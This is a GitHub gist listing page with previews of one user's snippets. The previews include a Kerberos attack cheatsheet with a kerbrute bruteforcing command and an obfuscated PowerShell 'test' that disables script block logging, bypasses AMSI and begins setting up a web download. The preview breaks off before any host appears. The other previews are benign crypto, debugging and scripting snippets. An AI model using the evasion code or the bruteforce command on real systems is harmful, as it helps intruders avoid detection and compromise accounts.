Skip to content

Instantly share code, notes, and snippets.

@robvinson
robvinson / kerberos_attacks_cheatsheet.md
Created Jul 25, 2020 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
View kerberos_attacks_cheatsheet.md

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@robvinson
robvinson / PowerView-3.0-tricks.ps1
Created Jun 25, 2020 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
View test
IF($PSVerSIonTabLE.PSVeRsIon.MAJoR -Ge 3){$GPF=[Ref].ASsemBlY.GETTYpe('System.Management.Automation.Utils')."GEtFIE`Ld"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GetVaLUe($nuLl);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$VAL=[CollECTIONS.GEnerIc.DICtiONaRY[STriNg,SyStEM.OBJecT]]::NeW();$VaL.ADD('EnableScriptB'+'lockLogging',0);$VAL.ADd('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VAl}ELsE{[SCrIPTBLock]."GetFie`LD"('signatures','N'+'onPublic,Static').SetVAlUE($NUll,(NEw-OBJECt CollectIons.GenERIc.HAshSeT[strINg]))}[REF].AssEMBLY.GEtType('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFieLd('amsiInitFailed','NonPublic,Static').SETVALuE($nULL,$true)};};[SYStEM.NET.SERVIcePOINtMANaGER]::ExPEcT100CoNTiNue=0;$Wc=NEw-OBJeCt SysTEM.NeT.WebCLIEnt;$u='Mozilla/5.0 (compat
View keybase.md

Keybase proof

I hereby claim:

  • I am robvinson on github.
  • I am robvinson (https://keybase.io/robvinson) on keybase.
  • I have a public key whose fingerprint is A820 6BA2 B5A5 D565 5BBD 8F76 50EB 0F9C B6B6 8E33

To claim this, I am signing this object:

View iteration-guesser.rb
#!/usr/bin/env ruby
require 'openssl'
SHA1 = OpenSSL::Digest::SHA1.new
# Verified functionality against
# Test Vector (http://tools.ietf.org/html/draft-josefsson-pbkdf2-test-vectors-06#page-3)
# Input:
# P = "password" (8 octets)
View parse_encrypt_dump_file.c
/*
To be used with an output file created by breaking
on the encrypt function with gdb, and grabbing it's
parameter:
attach --waitfor SomeProgram
break encrypt
commands
silent
View tracer.gdb
set logging file /tmp/Good-log.txt
set logging on
attach --waitfor Good
### Generic objective-c tracing
b objc_msgSend
commands
silent
# print class name and method name
printf "-[%s %s]\n", (char *)class_getName(*(long *)$r0,$r1),$r1
@robvinson
robvinson / gist:3504621
Created Aug 28, 2012
ruby preforking test program
View gist:3504621
#!/usr/bin/env ruby
# The trap is guaranteed to happen, and guaranteed to happen only
# once, right before the process exits for any reason (unless
# it's terminated with a SIGKILL).
#trap('EXIT') { acceptor.close }
CONTROL = []
CONTROL[0], CONTROL[1] = IO.pipe
@robvinson
robvinson / dl.sh
Created May 18, 2012
Get index page from web servers
View dl.sh
#!/bin/sh
DSTDIR=80open
mkdir $DSTDIR
is_empty() {
if [ -s $1 ]; then #exists and is not empty
return 1
else
if [ -f $1 ]; then #file exists and is empty
You can’t perform that action at this time.